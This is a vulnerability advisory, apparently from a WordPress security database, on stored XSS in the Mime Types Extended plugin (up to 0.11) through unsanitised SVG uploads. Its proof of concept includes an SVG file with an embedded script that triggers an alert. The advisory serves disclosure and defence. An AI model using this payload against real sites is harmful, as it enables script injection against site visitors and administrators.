WordPress Plugin Vulnerabilities

Mime Types Extended <= 0.11 - Author+ Stored XSS via SVG Upload

Description

The plugin does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.

Proof of Concept

1. As an admin, enable SVG uploads at https://example.com/wp-admin/options-general.php?page=mime-types-extended
2. As an author, upload a malicious SVG via the Media Library. Example SVG:

```
<svg xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert("xss");</script>
</svg>
```

Affects Plugins

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
Bob Matyas
Submitter
Bob Matyas
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2024-06-04 (about 26 days ago)
Added
2024-06-04 (about 25 days ago)
Last Updated
2024-06-04 (about 25 days ago)

Other